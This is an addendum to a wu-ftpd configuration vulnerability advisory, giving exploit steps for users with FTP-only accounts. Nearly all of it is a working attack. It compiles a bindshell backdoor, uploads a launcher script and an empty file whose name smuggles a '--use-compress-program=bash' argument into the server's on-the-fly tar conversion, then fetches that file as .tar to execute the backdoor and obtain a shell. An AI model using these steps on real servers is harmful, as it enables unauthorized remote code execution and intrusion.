suid@suid.kg - an addendum to wu-ftpd configuration vulnerability exploit information

Background:

	In the initial advisory I mentioned that users with valid ftp access only accounts may also
	execute arbitrary code. I did not however include exploit information for this. This information is
	now found below.

Exploit Information:

	With a valid FTP account only the server, the difficulty goes right down. You also have the added
	benefit of not being stuck in a chroot() environment at the end. Local exploit time.

	The exploit goes along much the same lines as the anonymous FTP exploit does:

	Create a backdoor, using bindshell from our previous example:

	$ gcc bindshell.c -o b -static

	If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
	use the following script example. Create a script to exec the desired commands:

	$ cat > blah
	#!/bin/bash
	./b &
	^D

	Now create empty file "--use-compress-program=bash blah"

	$ > "--use-compress-program=bash blah"

	FTP to your target, login with your username/password. Upload your 3 files:

	ftp> put b
	ftp> put blah
	ftp> put "--use-compress-program=bash blah"

	Do a SITE CHMOD for b and blah:
	
	ftp> quote SITE CHMOD 0755 b
	ftp> quote SITE CHMOD 0755 blah
	
	Now get your file:

	ftp> get "--use-compress-program=bash blah".tar

	Thats all there is to it. You now should have a shell on whatever port you specified.

	Merry Christmas!